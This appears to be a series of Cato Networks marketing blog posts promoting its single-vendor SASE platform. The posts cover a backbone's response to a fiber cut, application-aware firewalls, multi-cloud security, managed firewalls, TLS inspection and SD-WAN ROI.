The IT technology stack includes existing investments in SD-WAN, security appliances, and security services that have different contractual terms and subscription durations. Some customers want to let current contracts run their course before evaluating a move to converge existing point products into a SASE or SSE platform. Other customers work with vendors to shorten the migration period with buyout programs.
Working across organizational silos
SASE project is cross functional, involving the networking and security teams. Depending on organizational structure, the teams may be empowered to make standalone decisions, complicating a collaborative decision. We have seen strong IT leadership guide teams to evaluate a full transformation as an opportunity to maximize value for the business, while preserving role-based responsibility for their respective domains.
If bringing the teams together isn’t possible in the short term, a phased approach to SASE is appropriate. When SD-WAN or SSE decisions are taken independently the teams should assess providers that can deliver a single-platform SASE even if the requirements are limited to either the networking or the security domains.
The Way Forward: Your Transformation Journey, Done Your Way
As the provider of the world’s first and most mature single-vendor SASE platform, that is powered by Cato SSE 360 and Cato’s Edge SD-WAN, we empower you to choose how to approach your transformation journey. You can start with either network transformation (SD-WAN) or security transformation (SSE 360) and then proceed to complete the transformation by seamlessly expanding the deployment to a full SASE on the very same platform. Obviously, the deeper the convergence the larger the business value and impact it will create.
To learn more about visit the following links: Cato SASE, Cato SSE 360, Cato Edge SD-WAN, and Cato ZTNA.
Last week, once again the industry saw the importance of building your enterprise network on a global private backbone not just the public Internet. On...
Inside a Network Outage: How Cato SASE Cloud Overcame Last Week’s Fiber Optic Cable Cut Last week, once again the industry saw the importance of building your enterprise network on a global private backbone not just the public Internet. On Monday night, a major fiber optic cable was severed in the Bouches-du-Rhône region of France. The cut impacted the Internet worldwide. Instantly, packet loss surged to 100 percent on select carriers connecting to our Marseilles, Dubai, and Hong Kong PoPs.
And, yet, despite this major outage, Cato users were unaffected. No tickets were opened; no complaints filed. Why? Because the Cato SPACE architecture detected the packet loss spike on the carrier’s network and moved user traffic to one of the other tier-1 providers connecting the Cato PoP.
All of this was done automatically and in seconds. Just look at the below report from our Marseilles PoP. Notice how at 02:21 UTC Cato isolated the two affected carriers (aqua and orange lines) and traffic was picked up by the other carriers at the PoP.
Uplink Traffic Report from Cato’s Marseilles PoP
Click here to enlarge the image
It’s not the first time we’ve seen the resiliency of the Cato Global Private backbone. Whether it’s a network failure or a crash at a top-tier datacenter housing a Cato PoP Cato has proven its ability to automatically recover quickly with little or no impact on the user experience.
The network engineering involved in delivering that kind of availability and performance goes to the very DNA of Cato. From the very beginning, we built our company to address both networking and security. Our founders didn’t just help build the first commercial firewall (Shlomo Kramer) they also built one of the global cloud networks (Gur Shatz). The teams they lead and have built the tools and processes to lead in both domains, which is what’s required in this world of SASE.
When building the Cato Global Private Backbone, we wanted to provide enterprises with the optimum network experience regardless of a site’s location, route taken, or network condition. As such, we built many tiers of redundancy into Cato, such as users automatically connecting to the optimum PoP, instant failover between SPACE instances within a server, servers within a PoP, and between PoPs. (Follow the link for a detailed look at the resiliency built into the Cato Global Private Backbone.)
[boxlink link="https://www.catonetworks.com/resources/single-pass-cloud-engine-the-key-to-unlocking-the-true-value-of-sase/?utm_medium=blog_top_cta&utm_campaign=space_wp"] Single Pass Cloud Engine: The Key to Unlocking the True Value of SASE | EBOOK [/boxlink]
Building our backbone from third-party networks, such as those offered by Amazon, Azure or Google, would certainly have been easier, but that would also compromise our control over the underlying network. The network between two PoPs on an Azure or Amazon network in the same region or zone might be reliable enough, but what happens when those PoPs exist across the globe, in different hyperscaler regions/zones, or on separate hyperscaler networks altogether?
As both networking and security professionals, we at Cato didn’t want to leave those and other scenarios to chance. We wanted to own the problem from end-to-end and ensure enterprise customers that they would receive the optimum performance all the time from anywhere to anywhere even during failover conditions.
By building PoPs on our own infrastructure and curating PoP-to-PoP connectivity, we can control the routing, carrier selection, and PoP placement. Carriers connecting our PoPs have been carefully selected for zero packet loss and low latency to other PoPs and for optimal global and regional routes. Cato SPACE architecture monitors those carrier networks, automatically selecting the optimum path for every packet. This way no matter the scenario, users receive the optimum performance.
And by owning the infrastructure, we can deliver PoPs where enterprises require them not where hyperscalers want to place them. With 75+ PoPs all running Cato’s cloud-native SPACE architecture, Cato has more real time deep packet processing capacity than any hyperscaler worldwide. It’s why enterprises with users in 150+ countries trust Cato every day to help them slash telecom costs, boost performance by 20x, and increase availability to five nines by replacing their legacy MPLS networks with the Cato Global Private Backbone.
For many so-called SASE players, one or the other side gets missed. Players coming from the security world need to outsource PoP placement to third-parties who understand networking. Networking vendors coming to SASE need to partner for security expertise. Both approaches compromise the SASE solution. Cato is the only vendor in the world built from the ground up to be single-vendor SASE platform. This is why we can deliver the world’s most robust single-vendor cloud-native SASE platform – today.
Firewalls – the foundation of an organization’s network security strategy – filters network traffic and can enforce an organization’s security rules. By limiting the traffic...
Why Application Awareness is Essential for Firewall Security Firewalls - the foundation of an organization’s network security strategy - filters network traffic and can enforce an organization’s security rules. By limiting the traffic that enters and leaves or enters an organization’s network, a firewall can dramatically reduce its vulnerability to data breaches and other cyberattacks.
However, a firewall is only effective if it can accurately identify network traffic and apply the appropriate security policies and filtering rules. As application traffic is increasingly carried over HTTP(S), traditional, port-based methods of identifying application traffic are not always effective. Application awareness identifies the intended destination of application traffic, providing the visibility that next-generation firewalls (NGFWs) require to apply granular security policies.
What is Application Awareness?
Different network protocols have different functions and present varying security risks. This is why firewalls and other network security solutions are commonly configured with rules that apply to specific ports and protocols, such as restricting external access to certain services or looking for protocol-specific threats.
However, the growth of Software as a Service (SaaS) solutions and other web-based solutions has caused the HTTP(S) protocol to support a wider range of services. As a result, filtering traffic and applying security rules based on port numbers is less effective than before.
Application-aware networking and security solutions can identify the application that is the intended destination of network traffic. Doing so without relying solely on common port numbers requires a deep understanding of the network protocol and commands used by the application. For example, web browsing data and webmail data carried over HTTPS may have similar network packet headers but contain very different types of data.
The ability to differentiate between types of application traffic can provide several benefits beyond security. For example, an organization may implement network routing and quality of service (QoS) rules for traffic based on the target application. Latency-sensitive videoconferencing traffic may be prioritized, while browsing traffic to social media and other non-business sites may have a lower priority if it is permitted at all.
[boxlink link="https://catonetworks.easywebinar.live/registration-101?utm_medium=blog_top_cta&utm_campaign=future_of_security_webinar"] The Future of Network Security: Do All Roads Lead to SASE? | Webinar [/boxlink]
How Application Awareness Enhances Firewall Security
The Internet is increasingly dominated by HTTP(S) traffic as various applications move to web-based models with the growth of SaaS and other cloud-based services. The rise of DNS over HTTPS (DoH) and other protocols that attempt to leverage built-in TLS support within the HTTPS protocol accelerates this trend. However, these various types of traffic carried over the HTTP(S) protocol may present different levels of risk to the organization and be vulnerable to different types of attacks.
A one size fits all approach to securing these diverse applications can negatively impact application performance and security. An organization’s firewall rules may be configured based on the traffic associated with a particular protocol as a whole, so all web traffic may be permitted through, while other protocols may be blocked entirely. Additionally, security solutions may inspect traffic for malicious content that poses no risk to a particular application or overlook application-specific security risks.
Integrating application awareness into security solutions provides them with valuable context that can improve network security as well as network routing. For example, an understanding that a particular type of traffic is associated with Internet of Things (IoT) devices can enable next-generation firewalls (NGFWs) to search for threats common to those devices or block access to the devices from outside of the corporate WAN.
Granular network traffic inspection and security rules are essential to implementing an effective zero-trust security strategy. Application awareness is essential to achieving this granularity, especially as increasing volumes of application traffic are carried over the HTTP(S) protocol.
Taking Full Advantage of Application Awareness with SASE
Application awareness can provide benefits for numerous network tools, including those with both network performance and security functions. For example, on the networking side, application awareness is valuable to software-defined WAN (SD-WAN) solutions because it informs the routing of various traffic types over the corporate WAN and can help determine the priority of different types of traffic. On the security side, firewalls and other security solutions can use application awareness to tune security rules to an application’s unique needs and risk profile.
While application awareness can be implemented in each solution that uses it, this is an inefficient approach. SD-WANs, NGFWs, and other solutions that use application awareness all need to know the intended destination of a particular type of traffic. If each solution independently maintains a library of traffic signatures and applies them to each traffic flow, the result is a highly-redundant system that may negatively impact network latency and performance.
Secure Access Service Edge (SASE) solutions eliminate this redundancy and these performance impacts by converging many of the functions that require application awareness into a single solution. Under this design, SD-WANs, NGFWs, and other solutions that need insight into the destination of application traffic can access this information without computing it independently.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about Cato SASE Cloud’s targeted application security capabilities by signing up for a free demo today.
Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes...
Designing a Security Strategy for the Multi-Cloud Enterprise Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes with its costs, such as the challenges of securing an organization’s on-premises and cloud environments. For organizations making the move to the cloud, redesigning their security strategies to protect multi-cloud deployments can pose a significant challenge.
Most Companies Are Multi-Cloud
Cloud adoption is growing rapidly as companies take advantage of the numerous benefits and advantages available with cloud infrastructure. However, most organizations are not selecting a single cloud provider to augment or replace their existing on-prem data centers. In fact, 89% of businesses have a multi-cloud strategy.
When looking to move to the cloud, many options are available, and different cloud platforms are optimized for particular use cases and have their own advantages and disadvantages. Since companies’ cloud-based infrastructure is designed to fulfill various purposes — data storage and hosting of both internal and public-facing applications — the variety of cloud environments makes it possible for companies to choose environments that are optimized for a particular use case.
Multi-Cloud Environments Create Security Challenges
While multi-cloud deployments provide numerous advantages when compared to on-prem infrastructure, such as scalability, flexibility, availability, and cost savings, they also have their downsides.
Some of the security challenges associated with multi-cloud environments include:
Shared Responsibility Model: In cloud environments, a cloud customer shares responsibility for managing and securing their cloud infrastructure with the cloud provider. The cloud customer must gain and maintain expertise in understanding and securing their part. Disparate Environments: Multi-cloud deployments are composed of cloud infrastructure developed by various providers. The heterogeneity of an organization’s cloud deployment can make it complex to develop firewall security rules and enforce consistent security policies across multi-cloud and on-prem environments. On-Prem and Cloud-Based Infrastructure: Organizations rarely abandon on-prem infrastructure entirely when they move to the cloud. As a result, they must design security architectures that span on-prem and multiple cloud deployments. In some cases, security solutions designed for one environment may be less effective or entirely unable to function in another. Platform-Specific Solutions: Most cloud providers offer security solutions and configuration settings designed to secure deployments on their cloud platform. However, these solutions and settings vary from one provider to another, increasing the complexity of correctly configuring security settings and implementing consistent security across multiple environments.
Perimeterless Security: Historically, many organizations have adopted a perimeter-focused firewall security strategy designed to protect on-prem IT infrastructure. With cloud environments — and especially multi-cloud deployments — the perimeter has dissolved, making it necessary to design and implement a security strategy not focused on securing a perimeter. New Security Threats: A move to the cloud opens up an organization to new security threats not present in on-prem environments. As the number of cloud environments increases, so does the number of potential attack vectors.
Many organizations struggle with cloud security due to the unfamiliarity of cloud infrastructure and the differences between securing on-prem and cloud-based environments. With multi-cloud deployments, these challenges are amplified, and companies must figure out how to secure environments where legacy security models and technologies may not be effective.
[boxlink link="https://www.catonetworks.com/podcasts/private-cloud-public-cloud-where-do-we-stand-with-the-great-migration-of-services/?utm_medium=blog_top_cta&utm_campaign=convergence_podcast_ep2"] Private Cloud + Public Cloud: Where Do We Stand With the Great Migration of Services? | Podcast Episode [/boxlink]
SASE Enables Effective multi-cloud Security
Much of the complexity of multi-cloud security comes from the fact that a multi-cloud deployment consists of many unique cloud environments. What might work to secure one environment may be ineffective or infeasible in another.
Secure Access Service Edge (SASE) solutions diminish the complexity of securing multi-cloud deployments by securing the network instead. All traffic flowing to, from, and between an organization’s cloud-based and on-prem infrastructure travels over the network. By implementing security inspection and policy enforcement at the network level, SASE can consistently apply security across an organization’s entire IT infrastructure.
In addition to simplifying multi-cloud security, SASE also provides numerous other security benefits, which include:
Global Reach: SASE is deployed within cloud-based points of presence (PoP). Globally distributed PoPs ensure that traffic can be inspected at a geographically close PoP and then routed on to its destination without the backhauling required by on-prem security deployments. Security Integration: SASE solutions implement a full network security stack, including an NGFW, IPS, CASB, ZTNA, and more. By converging multiple security functions into a single solution, SASE achieves greater optimization than standalone solutions. Network Optimization: SASE PoPs also integrate network optimization capabilities such as SD-WAN and a global private backbone. PoPs are also connected by dedicated, high-performance network links to optimize network performance and minimize latency.
Scalable Security: As a cloud-native solution, SASE can also take advantage of the scalability benefits of the cloud. This makes it possible for SASE PoPs to scale to secure higher-bandwidth network traffic without negatively impacting network performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can help your organization secure its on-prem and multi-cloud infrastructure by signing up for a free demo today.
Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide...
New Gartner Report Identifies Four Missed Tips When Evaluating SASE Platform Capabilities Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE, Cato meets those capabilities delivering SWG, CASB, ZTNA, SD-WAN, FWaaS, and Malware inspection all at line-rate operation even when decrypting traffic.
While a single platform providing those capabilities is certainly impressive, we at Cato have never thought those features alone make for a single-vendor SASE platform. To radically simplify and improve their security and network operations, IT teams require a fully converged platform. Platforms where capabilities remain discrete and fail to share context and insight forces IT operation to continue juggling multiple consoles that leads to the difficulties IT has long faced when troubleshooting and securing legacy networks.
Gartner would seem to agree. In the 2022 Gartner Market Guide for Single-Vendor SASE (available here for download), Gartner explains how the core capabilities of a well-architected single-vendor SASE offering should be integrated together, unified in management and policy, built on a unified and scalable architecture and designed in a way that makes them flexible and easy to use.
You Say Integrated, We Say Converged
What Gartner describes as integrated we prefer to call converged. But whether it’s converged or integrated we both agree on the same point -- all capabilities must be delivered as from one engine where event data is stored in one common repository and surfaced through a common analytics engine.
[boxlink link="https://www.catonetworks.com/news/cato-has-been-recognized-as-representative-vendor-in-2022-gartner-market-guide-for-single-vendor-sase/?utm_medium=blog_top_cta&utm_campaign=gartner_market_guide_news"] Cato Networks Has Been Recognized as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE | Read now [/boxlink]
Unified Management and Policy: Essential for Visibility and Enforcement
Arguably the biggest operational challenge for legacy networks post-deployment is with data distributed across appliances and, by extension, data repositories. How do operational teams quickly identify and address and diagnose potentially malicious or problematic activity and then enforce consistent security policies across the enterprise? And, as a cloud service, how is that done in a way that gives enterprise customers complete control over their own networks while running on a shared platform?
At Cato, we’ve developed the Cato SASE Cloud so that a single management console gives enterprises control over all Cato capabilities – networking and security. A single policy stack uses common data objects enabling enterprises to set common security policies for users and resources in and out of the office. And the Cato architecture is a fully multitenant, distributed architecture giving users complete control over and visibility into their own networks.
The Cloud Provides Unified and Scalable Architecture
With legacy networks, IT teams must invest considerable time and resources on maintaining their branch infrastructure. Appliances need to be upgraded as new capabilities are enabled or traffic volumes grow. And with each new security feature enabled, there’s a performance hit that further degrades the user experience.
All of which is why Cato built the Cato SASE Cloud platform on a global network of PoPs. Every Cato PoP consists of multiple compute nodes with multiple processing cores, with each core running a copy of the Cato Single Pass Cloud Engine (SPACE), Cato’s converged networking and security software stack. Cato SPACE handles all routing, optimization, acceleration, decryption, and deep packet inspection processing and decisions. SPACE is a single-pass architecture, performing all security inspections in parallel, which allows Cato to maintain wire-speed inspection regardless of traffic volumes and enabled capabilities.
Make it Flexible, Make it Easy
With legacy networks, IT leaders had a tough choice: backhaul traffic to a central inspection point simplifying operations, but add latency and undermine performance, or inspect traffic on-site for better performance but far more complicated operations and deployment.
At Cato, we found a different approach: bring processing as close to the user as possible by building out a global network of PoPs. With the Cato SASE Cloud spanning so many PoPs worldwide, enterprise locations are typically within 25ms RTT of a Cato PoP. In fact, today, Cato serves 1,500 enterprises customers with sites and users in 150+ countries. With PoPs so nearby, enterprises gain the reduced latency experience of local inspection without burdening IT. All with the simplicity of a cloud service.
Single-Vendor SASE: It’s Not Just About the Features
SASE didn’t introduce new capabilities per se. Firewalling, SWG, CASB, ZTNA, SD-WAN, and malware inspection -- all of SASE's core capabilities receded SASE. What SASE introduced was a new way of delivering those capabilities: a singular cloud service where the capabilities are truly one -- fully converged (or integrated) together -- managed from one console and delivered globally from one platform, everywhere. Yes, evaluating features must be part of any SASE platform assessment, but to focus on features is to miss the point. It is the SASE values of convergence, simplicity, ubiquity, and flexibility -- not features -- that ultimately differentiate SASE platforms.
As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the...
How a Managed Firewall Can Help Close Corporate Security Gaps As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the organization against cyber attacks. However, many security teams lack the resources and personnel to keep pace of their expanding duties.
As security teams become overwhelmed, identifying ways to ease their burden is essential to minimizing the security gaps that leave companies vulnerable to attacks.
Most Security Teams are Struggling
Security teams’ responsibilities are rapidly expanding, and many are struggling to keep up. Some of the major challenges that IT and security teams face include:
Expanding IT Infrastructure: Corporate IT infrastructures are expanding and growing more diverse due to numerous drivers. Companies are increasingly adopting cloud infrastructure, remote and hybrid work models, and Internet of Things (IoT) and mobile devices. All of these bring new attack vectors and unique security requirements. Heterogeneous Architectures: The modern IT environment includes various architectures and environments. Each of these must be properly configured, and secured. This can create a diverse security architecture of standalone products that are difficult to effectively monitor, and manage.
Security Alert Overload: This collection of various security solutions also contributes to the alert overload facing modern security teams. The average enterprise security operations center (SOC) sees over 10,000 alerts per day, each of which requires an average of 24-30 minutes to address. With the inability to properly investigate every security alert — or even a reasonable percentage of them — security teams might make decisions that let real threats slip through the gaps, potentially while they waste their efforts on false positives. Vulnerability Management: Software vulnerabilities in production systems are an issue that is quickly spiraling out of control. Over 28,000 new vulnerabilities were discovered in 2021 alone, a 23% growth over the more than 23,000 discovered the previous year. Identifying, testing, and applying patches for vulnerabilities in corporate software and hardware — including the third-party libraries and components used by them — is a significant task, and many patch management programs lag behind, leaving the organization vulnerable.
At the same time, the cybersecurity industry is facing a significant skills gap, which means that companies struggle to attract and retain skilled personnel to fill critical roles. Overwhelmed and understaffed security teams lead to security gaps.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
Firewall Management is a Major Chore
Closing these security gaps requires the ability to reduce security teams’ workloads to a manageable level. One area with significant room for improvement is firewall management.
A network firewall is the cornerstone of an organization’s security architecture; however, it is not an easy tool to manage. Some of the time-consuming duties associated with firewall management include:
Firewall Rule Maintenance: Network firewall rules should be designed to restrict network traffic to only that required for business purposes. With increasingly diverse IT infrastructures, organizations must develop and maintain a range of firewall rules tuned to the needs of different devices and environments. Patch Management: Like other products, firewalls need patches and updates, and, due to their role within an organization’s environment, are common targets of attack. Security personnel should promptly test and apply updates when they become available. Monitoring and Management: Firewalls are not “set it and forget it” systems and require ongoing monitoring and maintenance to be effective. Investigating alerts, validating the effectiveness of firewall rules, and other ongoing activities consume time and resources.
Firewalls can significantly benefit an organization by blocking inbound and WAN-bound attacks before they reach their intended targets. By performing all of these firewall management tasks, security personnel lower corporate cybersecurity risk and achieve clear benefits to the organization.
However, the time spent configuring and managing firewalls could also be spent on other valuable security tasks as well. For example, the time and resources devoted to firewall management may have also been used to identify and remediate an intrusion before it became a data breach or malware infection.
A Managed Firewall Realigns Security Priorities
Security teams have roles and responsibilities that commonly exceed their abilities to carry them out. As corporate infrastructure grows larger and more complex, the growth in security team headcount cannot keep up. As a result, some work may be left undone, and security teams are often forced to perform triage to determine which tasks can be delayed or left incomplete with minimal risk to the organization.
Organizations can resolve this issue by taking steps to alleviate the burden on security personnel. By taking some of the tedious work — such as firewall maintenance— off of their plates, an organization can free up resources and its security team’s time and expertise for tasks where it is more greatly needed.
A managed firewall can enhance security while reducing overload on security personnel. A managed firewall service enables an organization to outsource responsibility for firewall management to a team of third-party experts. This provides companies with firewall rules based on evolving threat intelligence and solutions configured in accordance with industry best practice and regulatory requirements.
A managed Secure Access Service Edge (SASE) deployment takes this a step further, handing over the responsibility for maintenance of the organization’s entire network security stack to a third-party provider instead of just the firewall. Managed SASE also comes with additional benefits, such as improved integration of network and security functionality and optimized routing of WAN traffic over dedicated network links.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a complete cloud-native security service edge, Cato SSE 360, including Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS) into a global cloud service. Cato optimizes and secures application access for all users, locations, and applications, and empowers IT with a simple and easy to manage networking and security architecture. Learn more about optimizing your organization’s security operations by signing up for a free demo today.
Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing...
September 28, 2022
SASE Enables Consistent Security for the Modern Enterprise Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing many employees to work from outside the office and creating the need to securely provide remote access to the workforce.
These changes in corporate IT infrastructure create new security challenges as companies adapt to protect new environments and to combat an evolving cyber threat landscape. In many cases, organizations are finding that their existing security architecture — which was designed to secure an IT infrastructure that is mostly or wholly on-premises — is not up to the task of meeting the security requirements and business needs of the modern, digital enterprise.
The Corporate WAN is Rapidly Changing
In the past, the majority of an organization’s IT assets were located on-prem. The company managed its own data centers, and employees were primarily connected directly to the corporate LAN. Additionally, a company’s IT assets were largely homogenous, consisting of workstations and servers that had similar, well-known security needs.
Within the last several years, the corporate network has undergone significant changes. With the introduction of cloud computing, a growing percentage of an organization’s IT assets are located outside of the traditional network perimeter on infrastructure managed by a third party. Since 89% of companies have multi-cloud deployments, companies must learn to properly operate and manage multiple vendors’ unique solutions.
The growth of remote and hybrid work models in recent years has further transformed the corporate network. In addition to moving employees and their devices off-site, remote work also impacts the range of devices used for business purposes. Mobile devices are increasingly gaining access to corporate data and systems, and bring your own device (BYOD) policies mean that company data may be accessed and stored on devices that the company does not own or fully control.
Finally, the adoption of new technologies to improve corporate productivity and efficiency has an impact. Internet of Things (IoT) devices — including both commercial and consumer systems — are connected to corporate networks. These IoT devices have unique security challenges and introduce significant risk to corporate networks.
As corporate IT environments change, so do their security needs. New environments and devices have unique security risks that must be mitigated. The solutions designed for on-prem, primarily desktop environments, may not effectively protect new infrastructure if they can be used by them at all.
[boxlink link="https://catonetworks.easywebinar.live/registration-whats-the-difference-between-sse-360-and-sase?utm_medium=blog_top_cta&utm_campaign=AMA_sse_webinar"] Ask Me Anything: What’s the Difference Between SSE and SASE? | Watch Now [/boxlink]
Legacy Solutions Do not Fit Modern Security Needs
Many organizations have existing security architectures that are designed for a particular IT architecture. As this architecture evolves, these security solutions are often ill-suited to securing an organization’s new deployment environments and devices for various reasons, including:
Location-Specific Protection: Often, corporate security architectures are designed to define and secure the perimeter of the corporate network against inbound threats and outbound data exfiltration. However, the growth of cloud computing, remote work, and the IoT means that this perimeter is rapidly expanding to the point where it is infeasible and pointless to secure since it includes the entire Internet.Limited Scalability: Appliance-based security solutions, such as network firewalls, are limited by their hardware. A computer only has so much memory and CPU, and a network interface card has a maximum throughput. Cloud scalability and the growth of corporate networks can result in security appliances being overwhelmed with more traffic than they can handle.Computational Requirements: Many endpoint security solutions require a certain amount of processing power or memory on the device to function. As resource-constrained devices such as mobile and IoT devices become more common, these solutions may not be usable in all areas of an organization’s IT infrastructure.Environment-Specific Requirements: As corporate IT environments grow more complex and diverse, different environments may have specific security considerations. For example, appliance-based network firewalls and security solutions are not a feasible option in cloud deployments since the organization lacks control over its underlying IT infrastructure.
Attempting to adapt an organization’s existing security architecture to secure its evolving environment can create disjointed security policies that are inconsistently enforced across the corporate WAN. For example, cloud-based infrastructure can be protected by cloud-focused security solutions that differ from those protecting on-prem infrastructure, which increases the complexity and overhead of security management. Remote workers and mobile devices may suffer network performance issues as traffic is backhauled for security inspection before being routed on to its destination.
The legacy security solutions that comprise traditional perimeter-focused security architectures are designed for networks that are rapidly becoming extinct. Often, these solutions adapt poorly to securing the modern, distributed corporate WAN.
Designing Security for the Modern Enterprise
As corporate networks become more distributed, security must follow suit. Effectively protecting the modern corporate WAN requires security solutions that can provide consistent protection and security policy enforcement throughout the corporate network.
Secure Access Service Edge (SASE) is designed for the distributed enterprise and addresses the common shortcomings of legacy security solutions. SASE is implemented using a network of cloud-based points of presence (PoPs) that can be deployed geographically near an organization’s scattered IT assets and can take advantage of cloud scalability to meet evolving business needs. SASE solutions also incorporate a full security stack — including solutions designed for cloud infrastructure and remote users — enabling traffic to be inspected by any PoP before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. To learn more about Cato SASE Cloud and how it can help your organization’s security architecture keep up with the evolution of your network infrastructure, sign up for a demo today.
A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to...
September 22, 2022
Traditional Firewalls Can’t Keep Up with the Growth of Encrypted Traffic A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to ensure confidentiality, integrity, and authenticity of the data being transmitted. According to Google, approximately 95% of web browsing uses the encrypted HTTPS protocol.
This trend toward traffic encryption has been driven by a few different factors. As users become more educated about the differences between unencrypted HTTP and encrypted HTTPS and the threat of various attacks, they are opting for the more secure option wherever possible. Web browser vendors like Google are encouraging this trend by defaulting to the encrypted version of sites and labeling sites that only support HTTP as unsafe and reducing their SEO scores.
The move toward data encryption is a mixed blessing for cybersecurity. On one hand, the widespread use of SSL/TLS can help protect against phishing attacks or the exposure of user credentials and other sensitive data to someone eavesdropping on corporate network traffic. On the other hand, the same encryption that protects against eavesdroppers can also limit the effectiveness of an organization’s cybersecurity tools. Identification of malware and other malicious content with network traffic requires the ability to inspect the contents of packets traveling over the network. If this traffic is encrypted and network security solutions do not have the encryption key, then their threat prevention and detection capabilities are limited.
Network security solutions can overcome these challenges, but it comes at a cost. As the volume of network traffic increases and a growing percentage is encrypted, traditional network firewalls are falling behind, creating unnecessary tradeoffs between network performance and security.
Encrypted Traffic Inspection is a Bottleneck
Some organizations address the challenges that traffic encryption poses to security by performing TLS inspection. Security solutions that have access to the encryption keys used to protect network traffic can decrypt that traffic and inspect it for malicious content or data exfiltration before allowing it to continue on to its destination.
SSL inspection provides the ability to perform the deep packet inspection that security solutions need to do their jobs. However, decryption is a computationally expensive and time-consuming process. With growing volumes of encrypted traffic, decryption functionality within security solutions can create a significant bottleneck and degrade network performance. These issues are exacerbated by the fact that multiple solutions within an organization’s security architecture may need insight into the contents of network packets to fulfill their role. For example, firewalls, intrusion prevention systems (IPSs), secure web gateways (SWGs), and other security solutions may decide whether to allow or block traffic based on its contents.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
Decrypting TLS traffic can exhaust these security tools’ compute capacity, creating a bottleneck. If an organization has deployed multiple solutions that independently perform TLS decryption and deep packet inspection, then the effects of decryption on network performance are cumulative.
TLS inspection is essential to identifying and blocking threats before they enter an organization’s network and to stopping data exfiltration before it becomes a breach. However, the costs of doing so can be high, creating a tradeoff between network performance and security.
SASE Enables Scalable Enterprise Security
TLS inspection is a vital capability for many security solutions because it enables deep packet inspection and detection of malicious content within network traffic. One of the primary barriers to implementing TLS inspection at scale is that security solutions’ resources are exhausted, which can create significant latency as each tool in an organization’s security architecture individually decrypts and inspects network traffic.
Secure Access Service Edge (SASE) provides the ability to perform TLS inspection while minimizing the impacts on network performance and latency. Three core capabilities that make this possible include:
#1. Solution Convergence: SASE solutions converge a full network security stack into a single solution. This makes it possible to decrypt traffic once and provide all security solutions with access to the decrypted data for inspection without jeopardizing security. By eliminating the individual traffic decryption by each device, SASE dramatically decreases the impact of TLS inspection on network performance.
#2. Cloud-Native Design: SASE points of presence (PoPs) are built with cloud-native software. By deploying security functionality in the cloud, SASE can take advantage of cloud scalability, eliminating the bottlenecks created by computationally expensive decryption operations.
#3. Cost Saving: By offloading all the TLS inspection work to an elastic cloud-native SASE service, enterprises don't need to worry about upgrading on-premises appliances prematurely. This saves the organization both the procurement and the integration costs of the new appliances.
TLS inspection is vital to companies’ ability to protect themselves against evolving cyber threats. As the volume of encrypted traffic grows, traditional firewalls can’t keep up, creating tradeoffs between network performance and security. SASE is vital to the future of enterprise security because it enables strong corporate network security without compromising performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about improving your network visibility, performance, and security with Cato SASE Cloud by signing up for a demo today.
What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the...
September 20, 2022
The Return On Investment of SD-WAN What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the actual SD-WAN ROI is a mix of hard and soft savings from increasing overall network capacity and availability to a reduced operational load of managing and securing the network. Let's look at the various areas of savings SD-WAN can offer and the resulting ROI.
SD-WAN ROI Driver #1: Reducing MPLS Connectivity Costs
Enterprises have long invested in managed MPLS services to connect locations. The bandwidth is expensive (relative to Internet capacity) and often limited or unavailable on some routes, forcing companies to either pay exorbitant fees to connect locations or, more likely, resort to Internet-based VPNs, complicating network design.
SD-WAN promises to break that paradigm, replacing MPLS entirely or partly with affordable last-mile Internet connectivity. The magnitude of SD-WAN savings is often related to how much MPLS can be replaced and the type of Internet-based connectivity.
